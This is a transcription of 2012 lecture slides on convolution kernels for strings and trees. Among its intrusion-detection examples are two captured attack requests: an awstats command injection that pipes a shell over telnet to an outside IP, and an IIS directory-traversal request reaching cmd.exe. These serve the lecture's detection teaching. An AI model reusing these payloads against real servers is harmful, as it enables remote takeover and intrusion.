Lecture 9 - Universität Tübingen

Transcription

Lecture 9
Kernel Methods for Structured Inputs
Pavel Laskov and Blaine Nelson
Cognitive Systems Group
Wilhelm Schickard Institute for Computer Science
Universität Tübingen, Germany
Advanced Topics in Machine Learning, 2012
July 3, 2012
What We Have Learned So Far
Learning problems are defined in terms of kernel functions reflecting the
geometry of training data.
What if the data does not naturally belong to inner product spaces?
Example: Intrusion Detection
> GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d
\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: POPUPCHECK=11
50521721386\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel
Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d
\x0aConnection: keep-alive\x0d\x0aHost: www.spiegel.de\x0d\x0a
\x0d\x0a
> GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ct
elnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%
20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e
219%204321;echo%20YYY;echo| HTTP/1.1\x0d\x0aAccept: */*\x0d\x0a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d
\x0aHost: wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a
\x0d\x0a
> GET /Images/200606/tscreen2.gif HTTP/1.1\x0d\x0aAccept: */*\x0d\x0a
Accept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0a
Cookie: .ASPXANONYMOUS=AcaruKtUwo5mMjliZjIxZC1kYzI1LTQyYzQtYTMyNy0
3YWI2MjlkMjhiZGQ1; CommunityServer-UserCookie1001=lv=5/16/2006 12:
27:01 PM&mra=5/17/2006 9:02:37 AM\x0d\x0aUser-Agent: Mozilla/5.0
(Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like G
ecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost
: www.thedailywtf.com\x0d\x0a\x0d\x0a
Examples of Structured Input Data
Histograms
Strings
Graphs
Trees
[Figure: two example parse trees, "Jeff ate the apple" and "John hit the red car", with numbered productions and node labels S, NP, VP, N, V, D, A]
Convolution Kernels in a Nutshell
Decompose structured objects into comparable parts.
Aggregate the values of similarity measures for individual parts.
R-Convolution
Let X be a set of composite objects (e.g., cars), and X̄1 , . . . , X̄D be sets
of parts (e.g., wheels, brakes, etc.). All sets are assumed countable.
Let R denote the relation "being a part of":
R(x̄1, . . . , x̄D, x) = 1 iff x̄1, . . . , x̄D are parts of x
The inverse relation R⁻¹ is defined as:
R⁻¹(x) = {x̄ : R(x̄, x) = 1}
In other words, for each object x, R⁻¹(x) is the set of part tuples x̄ = (x̄1, . . . , x̄D) into which x decomposes.
We say that R is finite if R⁻¹(x) is finite for all x ∈ X.
R-Convolution: A Naive Example
Alfa Romeo Junior
Lada Niva
wheels
headlights
bumpers
transmission
differential
tow coupling
...
R-Convolution: Further Examples
Let x be a D-tuple in X = X1 × . . . × XD . Let each of the D
components of x ∈ X be a part of x. Then R(x̄, x) = 1 iff x̄ = x.
Let X1 = X2 = X be the set of all finite strings over a finite alphabet.
Define R(x̄1, x̄2, x) = 1 iff x = x̄1 ◦ x̄2, i.e. x is the concatenation of x̄1 and x̄2.
Let X1 = . . . = XD = X be the set of ordered, rooted trees of degree D.
Define R(x̄, x) = 1 iff x̄1, . . . , x̄D are the D subtrees of the root of x ∈ X.
R-Convolution Kernel
Definition
Let x, y ∈ X and x̄ and ȳ be the corresponding sets of parts. Let
Kd (x̄d , ȳd ) be a kernel between the d-th parts of x and y (1 ≤ d ≤ D).
Then the convolution kernel between x and y is defined as:
K(x, y) = Σ_{x̄ ∈ R⁻¹(x)} Σ_{ȳ ∈ R⁻¹(y)} ∏_{d=1}^{D} Kd(x̄d, ȳd)
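To make the definition concrete, here is a minimal Python sketch of the formula above. It assumes the decomposition is available as a function R_inv(x) that returns the part tuples in R⁻¹(x), together with a list of part kernels K1, . . . , KD; these names are illustrative and not part of the lecture.

from math import prod

def convolution_kernel(x, y, R_inv, part_kernels):
    # Sum the product of part kernels over all pairs of decompositions.
    total = 0.0
    for x_parts in R_inv(x):
        for y_parts in R_inv(y):
            total += prod(Kd(xd, yd)
                          for Kd, xd, yd in zip(part_kernels, x_parts, y_parts))
    return total

For the trivial decomposition of a D-tuple into its D components (the first example above), R_inv(x) contains the single tuple x, and the double sum collapses to one product of per-component kernels.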
Examples of R-Convolution Kernels
RBF kernel is a convolution kernel. Let each of the D dimensions of x be a part, and Kd(xd, yd) = exp(−(xd − yd)²/2σ²). Then
K(x, y) = ∏_{d=1}^{D} exp(−(xd − yd)²/2σ²) = exp(−Σ_{d=1}^{D} (xd − yd)²/2σ²) = exp(−‖x − y‖²/2σ²)
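A quick numerical check of this factorization, as a hedged sketch using NumPy (the vectors and σ are arbitrary and purely illustrative):

import numpy as np

rng = np.random.default_rng(0)
x, y, sigma = rng.normal(size=5), rng.normal(size=5), 1.3

# Per-dimension Gaussian part kernels Kd(xd, yd) ...
per_dim = np.exp(-(x - y) ** 2 / (2 * sigma ** 2))
# ... whose product equals the full RBF kernel on the whole vectors.
full_rbf = np.exp(-np.linalg.norm(x - y) ** 2 / (2 * sigma ** 2))

assert np.isclose(per_dim.prod(), full_rbf)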
Linear kernel K(x, y) = Σ_{d=1}^{D} xd yd is not a convolution kernel, except for the trivial "single part" decomposition. For any other decomposition, we would need to sum products of more than one term, which contradicts the formula for the linear kernel.
Subset Product Kernel
Theorem
Let K be a kernel on a set U × U. Then for all finite, non-empty subsets A, B ⊆ U,
K′(A, B) = Σ_{x∈A} Σ_{y∈B} K(x, y)
is a valid kernel.
Subset Product Kernel
Proof.
Goal: show that K′(A, B) is an inner product in some space...
Recall that for any point u ∈ U, K(u, ·) is a function Ku in some RKHS H. Let fA = Σ_{u∈A} Ku and fB = Σ_{u∈B} Ku. Define
⟨fA, fB⟩ := Σ_{x∈A} Σ_{y∈B} K(x, y)
We need to show that it satisfies the properties of an inner product... Let fC = Σ_{u∈C} Ku. Clearly,
⟨fA + fC, fB⟩ = Σ_{x∈A∪C} Σ_{y∈B} K(x, y) = Σ_{x∈A} Σ_{y∈B} K(x, y) + Σ_{x∈C} Σ_{y∈B} K(x, y)
Other properties of the inner product can be proved similarly.
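The subset product kernel translates directly into code; a minimal sketch, assuming an arbitrary base kernel K given as a Python function (the function names are illustrative):

def subset_product_kernel(A, B, K):
    # Double sum of the base kernel over all pairs (x, y) in A x B.
    return sum(K(x, y) for x in A for y in B)

# Example with the ordinary product on U = R as base kernel:
# subset_product_kernel({1, 2}, {3, 4}, lambda x, y: x * y) == 21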
Back to the R-Convolution Kernel
Theorem
K(x, y) = Σ_{x̄ ∈ R⁻¹(x)} Σ_{ȳ ∈ R⁻¹(y)} ∏_{d=1}^{D} Kd(x̄d, ȳd)
is a valid kernel.
Back to the R-Convolution Kernel
Proof.
Let U = X1 × . . . × XD . From the closure of kernels under the tensor
product, it follows that
K̃(x̄, ȳ) = ∏_{d=1}^{D} Kd(x̄d, ȳd)
is a kernel on U × U. Applying the Subset Product Kernel Theorem for
A = R −1 (x), B = R −1 (y ), the theorem’s claim follows.
End of Theory
Convolution Kernels for Strings
Let x, y ∈ A∗ be two strings generated from the alphabet A. How can we
define K (x, y ) using the ideas of convolution kernels?
Let D = 1 and take X1 to be the set of all possible strings of length n ("n-grams") generated from the alphabet A; |X1| = |A|ⁿ.
For any x ∈ A∗ and any x̄ ∈ X1, define R(x̄, x) = 1 iff x̄ ⊆ x (x̄ is a substring of x).
Then R⁻¹(x) is the set of all n-grams contained in x.
Define K(x̄, ȳ) = 1[x̄ = ȳ].
K(x, y) = Σ_{x̄ ∈ R⁻¹(x)} Σ_{ȳ ∈ R⁻¹(y)} 1[x̄ = ȳ]
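A minimal Python sketch of this n-gram kernel, treating R⁻¹(x) as the multiset of n-gram occurrences (as in the counting examples later in the lecture); the function names are illustrative:

from collections import Counter

def ngrams(x, n):
    # Multiset of n-grams occurring in x.
    return Counter(x[i:i + n] for i in range(len(x) - n + 1))

def ngram_kernel(x, y, n):
    # Double sum of 1[x̄ = ȳ] over all occurrences = dot product of n-gram counts.
    phi_x, phi_y = ngrams(x, n), ngrams(y, n)
    return sum(count * phi_y[g] for g, count in phi_x.items())

For instance, ngram_kernel("abbaa", "baaaa", 2) evaluates to 4, which matches the suffix-tree example later in the lecture.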
Convolution Kernels for Strings (ctd.)
An alternative definition of a kernel for two strings can be obtained as
follows:
Let D = 1, take X1 to be the set of all possible strings of arbitrary
length generated from the alphabet A. |X1 | = ∞.
For any x ∈ A∗ and any x̄ ∈ X1 , define R(x̄, x) = 1 iff x̄ ⊆ x.
Then R⁻¹(x) is the set of all substrings contained in x.
Define K (x̄, ȳ ) = 1[x̄=ȳ ] .
K(x, y) = Σ_{x̄ ∈ R⁻¹(x)} Σ_{ȳ ∈ R⁻¹(y)} 1[x̄ = ȳ]
Notice that the size of the summation remains finite despite the infinite
dimensionality of X1 .
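A brief sketch of this variant: only the substrings that actually occur in x and y enter the sum, which is why the computation stays finite even though X1 is infinite (the names are illustrative):

from collections import Counter

def substrings(x):
    # Multiset of all contiguous substrings of x.
    return Counter(x[i:j] for i in range(len(x)) for j in range(i + 1, len(x) + 1))

def all_substring_kernel(x, y):
    phi_x, phi_y = substrings(x), substrings(y)
    return sum(count * phi_y[s] for s, count in phi_x.items())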
Geometry of String Kernels
[Figure: four example sequences,
1. blabla blubla blablabu aa
2. bla blablaa bulab bb abla
3. a blabla blabla ablub bla
4. blab blab abba blabla blu
are decomposed into subsequences, the subsequences are counted in histograms (features such as bla, blab, blabla, abba, aa, . . .), and the histograms place the four sequences as points in a feature space (geometry).]
Metric Embedding of Strings
Define the language S ⊆ A∗ of possible
features, e.g., n-grams, words, all
subsequences.
For each sequence x, count occurrences of
each feature in it:
φ : x −→ (φs (x))s∈S
Use φs (x) as the s-th coordinate of x in the
vector space of dimensionality |S|.
Define K(x, y) := ⟨φ(x), φ(y)⟩. This is equivalent to the K(x, y) defined by the convolution kernel!
Similarity Measure for Embedded Strings
Metric embedding enables application of various vectorial similarity
measures over sequences, e.g.
Kernels
  Linear:     K(x, y) = Σ_{s∈S} φs(x) φs(y)
  RBF:        K(x, y) = exp(−d(x, y)²/σ)
Distances
  Manhattan:  d(x, y) = Σ_{s∈S} |φs(x) − φs(y)|
  Minkowski:  d(x, y) = ( Σ_{s∈S} |φs(x) − φs(y)|^k )^(1/k)
  Hamming:    d(x, y) = Σ_{s∈S} sgn |φs(x) − φs(y)|
  Chebyshev:  d(x, y) = max_{s∈S} |φs(x) − φs(y)|
Similarity coefficients
  Jaccard, Kulczynski, . . .
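A brief sketch of a few of these measures on sparse feature histograms, represented here as Python dicts mapping feature → count (names are illustrative):

def linear_kernel(phi_x, phi_y):
    # Only features present in both histograms contribute.
    return sum(c * phi_y.get(s, 0) for s, c in phi_x.items())

def manhattan(phi_x, phi_y):
    # Features present in either histogram contribute.
    return sum(abs(phi_x.get(s, 0) - phi_y.get(s, 0)) for s in set(phi_x) | set(phi_y))

def chebyshev(phi_x, phi_y):
    return max(abs(phi_x.get(s, 0) - phi_y.get(s, 0)) for s in set(phi_x) | set(phi_y))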
Embedding example
X = abrakadabra
Y = barakobama
1-gram histograms:
  X: a/5  b/2  d/1  k/1  r/2                          ‖X‖ = 5.92
  Y: a/4  b/2  k/1  m/1  o/1  r/1                     ‖Y‖ = 4.90
  X · Y = 5·4 + 2·2 + 1·1 + 2·1 = 27,  ∠XY = 21.5°

2-gram histograms:
  X: ab/2  ad/1  ak/1  br/2  da/1  ka/1  ra/2         ‖X‖ = 4.00
  Y: ak/1  am/1  ar/1  ba/2  ko/1  ma/1  ob/1  ra/1   ‖Y‖ = 3.46
  X · Y = 1·1 + 2·1 = 3,  ∠XY = 77.5°
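The 1-gram figures can be recomputed directly (the 2-gram case is analogous); a small sketch with illustrative variable names:

import math
from collections import Counter

X, Y = "abrakadabra", "barakobama"
phi_x, phi_y = Counter(X), Counter(Y)

dot = sum(c * phi_y[s] for s, c in phi_x.items())         # 27
norm_x = math.sqrt(sum(c * c for c in phi_x.values()))    # ≈ 5.92
norm_y = math.sqrt(sum(c * c for c in phi_y.values()))    # ≈ 4.90
angle = math.degrees(math.acos(dot / (norm_x * norm_y)))  # angle between X and Y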
Implementation of String Kernels
General observations
The embedding space has huge dimensionality but is very sparse; at most a linear number of entries is non-zero in each sample.
Computation of similarity measures requires operations on either the
intersection or the union of the set of non-zero features in each sample.
Implementation strategies
Explicit but sparse representation of feature vectors
⇒ sorted arrays or hash tables
Implicit and general representations
⇒ tries, suffix trees, suffix arrays
String Kernels using Sorted Arrays
Store all features in sorted arrays
Traverse the feature arrays of two samples to find matching elements
  φ(x): aa (3)  ab (2)  bc (2)  cc (1)
  φ(z): ab (3)  ba (2)  bb (1)  bc (4)
Running time:
Sorting: O(n)
Comparison: O(n)
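A minimal sketch of the sorted-array comparison, assuming each sample is stored as a list of (feature, count) pairs sorted by feature (names are illustrative):

def dot_sorted(phi_x, phi_z):
    # Single simultaneous pass over both sorted arrays.
    i, j, total = 0, 0, 0
    while i < len(phi_x) and j < len(phi_z):
        (fx, cx), (fz, cz) = phi_x[i], phi_z[j]
        if fx == fz:
            total += cx * cz
            i, j = i + 1, j + 1
        elif fx < fz:
            i += 1
        else:
            j += 1
    return total

phi_x = [("aa", 3), ("ab", 2), ("bc", 2), ("cc", 1)]
phi_z = [("ab", 3), ("ba", 2), ("bb", 1), ("bc", 4)]
# dot_sorted(phi_x, phi_z) == 2*3 + 2*4 == 14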
String Kernels using Generalized Suffix Trees
2-gram counts:
         "abbaa"   "baaaa"
  aa        1         3
  ab        1         0
  ba        1         1
  bb        1         0
"abbaa" · "baaaa" = 1·3 + 1·0 + 1·1 + 1·0 = 4
[Figure: generalized suffix tree built over "abbaa#" and "baaaa$"; the per-string occurrence counts of matching 2-grams are read off the annotated tree nodes.]
Tree Kernels: Motivation
Trees are ubiquitous representations in various applications:
Parsing: parse trees
Content representation: XML, DOM
Bioinformatics: phylogeny
Ad-hoc features related to trees, e.g. number of nodes or edges, are not
informative for learning
Structural properties of trees, on the other hand, may be very
discriminative
Example: Normal HTTP Request
GET /test.gif HTTP/1.1<NL> Accept: */*<NL> Accept-Language: en<NL>
Referer: http://host/<NL> Connection: keep-alive<NL>
<httpSession>
  <request>
    <method> GET
    <uri>
      <path> /test.gif
    <version> HTTP/1.1
    <reqhdr>
      <hdr>1: <hdrkey> Accept:      <hdrval> */*
      <hdr>2: <hdrkey> Referer:     <hdrval> http://host
      <hdr>3: <hdrkey> Connection:  <hdrval> keep-alive
Example: Malicious HTTP Request
GET /scripts/..%%35c../cmd.exe?/c+dir+c:\ HTTP/1.0
<httpSession>
  <request>
    <method> GET
    <uri>
      <path> /scripts/..%%35c../.../cmd.exe?
      <getparamlist>
        <getparam>
          <getkey> /c+dir+c:\
    <version> HTTP/1.0
Convolution Kernels for Trees
Similar to strings, we can define kernels for trees using the convolution
kernel framework:
Let D = 1 and X1 = X be the set of all trees; |X1| = |X| = ∞.
For any x ∈ X and any x̄ ∈ X1, define R(x̄, x) = 1 iff x̄ ⊆ x
⇒ x̄ is a subtree of x
Then R⁻¹(x) is the set of all subtrees contained in x.
Define K(x̄, ȳ) = 1[x̄ = ȳ].
K(x, y) = Σ_{x̄ ∈ R⁻¹(x)} Σ_{ȳ ∈ R⁻¹(y)} 1[x̄ = ȳ]
Problem: Testing for equality between two trees may be extremely costly!
Recursive Computation of Tree Kernels
Two useful facts:
Transitivity of a subtree relationship: x̄ ⊆ x̂ & x̂ ⊆ x ⇒ x̄ ⊆ x
Necessary condition for equality: two trees are equal only if all of their
subtrees are equal.
Recursive scheme
Let Ch(x̄) denote the set of immediate children of the root of (sub)tree x̄.
|x̄| := |Ch(x̄)|.
If Ch(x̄) ≠ Ch(ȳ), return 0.
If |x̄| = |ȳ| = 0 (both nodes are leaves), return 1.
Otherwise return
K(x̄, ȳ) = ∏_{i=1}^{|x̄|} (1 + K(x̄i, ȳi))
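A minimal Python sketch of this recursive scheme, assuming a tree is represented as a (label, children) pair; the representation and names are illustrative:

def tree_kernel(x, y):
    # Trees are (label, children) pairs; Ch(x̄) is the sequence of child labels.
    x_children, y_children = x[1], y[1]
    if [c[0] for c in x_children] != [c[0] for c in y_children]:
        return 0
    if not x_children:
        # Both nodes are leaves.
        return 1
    # Otherwise multiply the contributions of the child pairs.
    k = 1
    for xc, yc in zip(x_children, y_children):
        k *= 1 + tree_kernel(xc, yc)
    return k

For example, with x = ("S", [("NP", []), ("VP", [])]) and an identical y, tree_kernel(x, y) returns (1 + 1) · (1 + 1) = 4.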
Computation of Recursive Clause
Find a pair of nodes with identical subsets of children.
Add one for the nodes themselves (subtrees of cardinality 1).
Add counts for all matching subtrees.
Multiply together and return the total count.
Summary
Kernels for structured data extend learning methods to a vast variety of
practical data types.
A generic framework for handling structured data is offered by
convolution kernels.
Special data structures and algorithms are needed for efficiency.
Extensive range of applications:
natural language processing
bioinformatics
computer security
Bibliography I
[1] M. Collins and N. Duffy. Convolution kernels for natural language. In Advances in Neural Information Processing Systems (NIPS), volume 16, pages 625–632, 2002.
[2] D. Haussler. Convolution kernels on discrete structures. Technical Report
UCSC-CRL-99-10, UC Santa Cruz, July 1999.
[3] K. Rieck and P. Laskov. Linear-time computation of similarity measures for
sequential data. Journal of Machine Learning Research, 9:23–48, 2008.